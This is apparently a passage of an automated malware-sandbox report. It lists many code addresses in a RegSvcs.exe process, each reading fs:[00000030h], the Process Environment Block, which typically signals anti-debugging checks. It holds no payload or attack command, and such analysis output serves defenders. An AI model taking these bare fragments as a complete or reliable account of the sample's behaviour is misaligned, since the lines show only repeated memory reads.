Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011629F9 mov eax, dword ptr fs:[00000030h]	7_2_011629F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BE9E0 mov eax, dword ptr fs:[00000030h]	7_2_011BE9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BC810 mov eax, dword ptr fs:[00000030h]	7_2_011BC810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov ecx, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A830 mov eax, dword ptr fs:[00000030h]	7_2_0116A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01160854 mov eax, dword ptr fs:[00000030h]	7_2_01160854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134859 mov eax, dword ptr fs:[00000030h]	7_2_01134859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134859 mov eax, dword ptr fs:[00000030h]	7_2_01134859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BE872 mov eax, dword ptr fs:[00000030h]	7_2_011BE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BE872 mov eax, dword ptr fs:[00000030h]	7_2_011BE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BC89D mov eax, dword ptr fs:[00000030h]	7_2_011BC89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130887 mov eax, dword ptr fs:[00000030h]	7_2_01130887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011428D0 mov ecx, dword ptr fs:[00000030h]	7_2_011428D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E8C0 mov eax, dword ptr fs:[00000030h]	7_2_0115E8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C8F9 mov eax, dword ptr fs:[00000030h]	7_2_0116C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C8F9 mov eax, dword ptr fs:[00000030h]	7_2_0116C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EB20 mov eax, dword ptr fs:[00000030h]	7_2_0115EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EB20 mov eax, dword ptr fs:[00000030h]	7_2_0115EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128B50 mov eax, dword ptr fs:[00000030h]	7_2_01128B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CB7E mov eax, dword ptr fs:[00000030h]	7_2_0112CB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142B79 mov eax, dword ptr fs:[00000030h]	7_2_01142B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142B79 mov eax, dword ptr fs:[00000030h]	7_2_01142B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142B79 mov eax, dword ptr fs:[00000030h]	7_2_01142B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140BBE mov eax, dword ptr fs:[00000030h]	7_2_01140BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140BBE mov eax, dword ptr fs:[00000030h]	7_2_01140BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130BCD mov eax, dword ptr fs:[00000030h]	7_2_01130BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130BCD mov eax, dword ptr fs:[00000030h]	7_2_01130BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130BCD mov eax, dword ptr fs:[00000030h]	7_2_01130BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138BF0 mov eax, dword ptr fs:[00000030h]	7_2_01138BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138BF0 mov eax, dword ptr fs:[00000030h]	7_2_01138BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138BF0 mov eax, dword ptr fs:[00000030h]	7_2_01138BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168BF0 mov ecx, dword ptr fs:[00000030h]	7_2_01168BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168BF0 mov eax, dword ptr fs:[00000030h]	7_2_01168BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168BF0 mov eax, dword ptr fs:[00000030h]	7_2_01168BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EBFC mov eax, dword ptr fs:[00000030h]	7_2_0115EBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BCBF0 mov eax, dword ptr fs:[00000030h]	7_2_011BCBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01192BF6 mov eax, dword ptr fs:[00000030h]	7_2_01192BF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BCA11 mov eax, dword ptr fs:[00000030h]	7_2_011BCA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128A00 mov eax, dword ptr fs:[00000030h]	7_2_01128A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128A00 mov eax, dword ptr fs:[00000030h]	7_2_01128A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01154A35 mov eax, dword ptr fs:[00000030h]	7_2_01154A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01154A35 mov eax, dword ptr fs:[00000030h]	7_2_01154A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CA38 mov eax, dword ptr fs:[00000030h]	7_2_0116CA38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CA24 mov eax, dword ptr fs:[00000030h]	7_2_0116CA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h]	7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01160A50 mov eax, dword ptr fs:[00000030h]	7_2_01160A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140A5B mov eax, dword ptr fs:[00000030h]	7_2_01140A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140A5B mov eax, dword ptr fs:[00000030h]	7_2_01140A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142A45 mov eax, dword ptr fs:[00000030h]	7_2_01142A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142A45 mov eax, dword ptr fs:[00000030h]	7_2_01142A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142A45 mov eax, dword ptr fs:[00000030h]	7_2_01142A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACA72 mov eax, dword ptr fs:[00000030h]	7_2_011ACA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACA72 mov eax, dword ptr fs:[00000030h]	7_2_011ACA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CA6F mov eax, dword ptr fs:[00000030h]	7_2_0116CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CA6F mov eax, dword ptr fs:[00000030h]	7_2_0116CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CA6F mov eax, dword ptr fs:[00000030h]	7_2_0116CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168A90 mov edx, dword ptr fs:[00000030h]	7_2_01168A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112EA80 mov eax, dword ptr fs:[00000030h]	7_2_0112EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112EA80 mov eax, dword ptr fs:[00000030h]	7_2_0112EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h]	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138AA0 mov eax, dword ptr fs:[00000030h]	7_2_01138AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138AA0 mov eax, dword ptr fs:[00000030h]	7_2_01138AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01186AA4 mov eax, dword ptr fs:[00000030h]	7_2_01186AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130AD0 mov eax, dword ptr fs:[00000030h]	7_2_01130AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164AD0 mov eax, dword ptr fs:[00000030h]	7_2_01164AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164AD0 mov eax, dword ptr fs:[00000030h]	7_2_01164AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01186ACC mov eax, dword ptr fs:[00000030h]	7_2_01186ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01186ACC mov eax, dword ptr fs:[00000030h]	7_2_01186ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01186ACC mov eax, dword ptr fs:[00000030h]	7_2_01186ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116AAEE mov eax, dword ptr fs:[00000030h]	7_2_0116AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116AAEE mov eax, dword ptr fs:[00000030h]	7_2_0116AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01126D10 mov eax, dword ptr fs:[00000030h]	7_2_01126D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01126D10 mov eax, dword ptr fs:[00000030h]	7_2_01126D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01126D10 mov eax, dword ptr fs:[00000030h]	7_2_01126D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164D1D mov eax, dword ptr fs:[00000030h]	7_2_01164D1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114AD00 mov eax, dword ptr fs:[00000030h]	7_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114AD00 mov eax, dword ptr fs:[00000030h]	7_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114AD00 mov eax, dword ptr fs:[00000030h]	7_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B8D20 mov eax, dword ptr fs:[00000030h]	7_2_011B8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130D59 mov eax, dword ptr fs:[00000030h]	7_2_01130D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130D59 mov eax, dword ptr fs:[00000030h]	7_2_01130D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130D59 mov eax, dword ptr fs:[00000030h]	7_2_01130D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h]	7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h]	7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h]	7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h]	7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h]	7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CDB1 mov ecx, dword ptr fs:[00000030h]	7_2_0116CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CDB1 mov eax, dword ptr fs:[00000030h]	7_2_0116CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CDB1 mov eax, dword ptr fs:[00000030h]	7_2_0116CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01158DBF mov eax, dword ptr fs:[00000030h]	7_2_01158DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01158DBF mov eax, dword ptr fs:[00000030h]	7_2_01158DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01166DA0 mov eax, dword ptr fs:[00000030h]	7_2_01166DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EDD3 mov eax, dword ptr fs:[00000030h]	7_2_0115EDD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EDD3 mov eax, dword ptr fs:[00000030h]	7_2_0115EDD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4DD7 mov eax, dword ptr fs:[00000030h]	7_2_011B4DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4DD7 mov eax, dword ptr fs:[00000030h]	7_2_011B4DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115CDF0 mov eax, dword ptr fs:[00000030h]	7_2_0115CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115CDF0 mov ecx, dword ptr fs:[00000030h]	7_2_0115CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01150DE1 mov eax, dword ptr fs:[00000030h]	7_2_01150DE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CDEA mov eax, dword ptr fs:[00000030h]	7_2_0112CDEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CDEA mov eax, dword ptr fs:[00000030h]	7_2_0112CDEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140C00 mov eax, dword ptr fs:[00000030h]	7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140C00 mov eax, dword ptr fs:[00000030h]	7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140C00 mov eax, dword ptr fs:[00000030h]	7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140C00 mov eax, dword ptr fs:[00000030h]	7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4C0F mov eax, dword ptr fs:[00000030h]	7_2_011B4C0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CC00 mov eax, dword ptr fs:[00000030h]	7_2_0116CC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112EC20 mov eax, dword ptr fs:[00000030h]	7_2_0112EC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h]	7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136C50 mov eax, dword ptr fs:[00000030h]	7_2_01136C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136C50 mov eax, dword ptr fs:[00000030h]	7_2_01136C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136C50 mov eax, dword ptr fs:[00000030h]	7_2_01136C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164C59 mov eax, dword ptr fs:[00000030h]	7_2_01164C59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01150C44 mov eax, dword ptr fs:[00000030h]	7_2_01150C44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01150C44 mov eax, dword ptr fs:[00000030h]	7_2_01150C44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113CC74 mov eax, dword ptr fs:[00000030h]	7_2_0113CC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128C8D mov eax, dword ptr fs:[00000030h]	7_2_01128C8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01158CB1 mov eax, dword ptr fs:[00000030h]	7_2_01158CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01158CB1 mov eax, dword ptr fs:[00000030h]	7_2_01158CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4CA8 mov eax, dword ptr fs:[00000030h]	7_2_011B4CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACCA0 mov ecx, dword ptr fs:[00000030h]	7_2_011ACCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACCA0 mov eax, dword ptr fs:[00000030h]	7_2_011ACCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACCA0 mov eax, dword ptr fs:[00000030h]	7_2_011ACCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACCA0 mov eax, dword ptr fs:[00000030h]	7_2_011ACCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128CD0 mov eax, dword ptr fs:[00000030h]	7_2_01128CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142CDC mov eax, dword ptr fs:[00000030h]	7_2_01142CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142CDC mov eax, dword ptr fs:[00000030h]	7_2_01142CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142CDC mov eax, dword ptr fs:[00000030h]	7_2_01142CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CCC8 mov eax, dword ptr fs:[00000030h]	7_2_0112CCC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01162CF0 mov eax, dword ptr fs:[00000030h]	7_2_01162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01162CF0 mov eax, dword ptr fs:[00000030h]	7_2_01162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01162CF0 mov eax, dword ptr fs:[00000030h]	7_2_01162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01162CF0 mov eax, dword ptr fs:[00000030h]	7_2_01162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132F12 mov eax, dword ptr fs:[00000030h]	7_2_01132F12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CF1F mov eax, dword ptr fs:[00000030h]	7_2_0116CF1F
